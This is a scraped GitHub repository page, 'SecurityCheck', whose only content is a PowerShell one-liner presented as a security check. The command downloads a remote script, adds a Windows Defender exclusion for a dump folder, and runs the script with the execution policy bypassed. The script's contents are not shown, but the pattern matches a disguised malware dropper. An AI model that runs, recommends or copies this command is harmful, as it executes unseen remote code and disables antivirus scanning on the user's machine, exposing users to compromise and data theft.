New-Item -Path "C:\Temp" -ItemType Directory -Force | Out-Null; Set-Location "C:\Temp"; Invoke-WebRequest -Uri "https://raw.githubusercontent.com/Brevzor/SecurityCheck/main/Checker.ps1" -OutFile "Checker.ps1"; Add-MpPreference -ExclusionPath 'C:\Temp\Dump' | Out-Null; powershell -ExecutionPolicy Bypass -File "C:\Temp\Checker.ps1";
-
Notifications
You must be signed in to change notification settings - Fork 0
License
Brevzor/SecurityCheck
About
No description, website, or topics provided.
Resources
License
Stars
Watchers
Forks
Packages 0
No packages published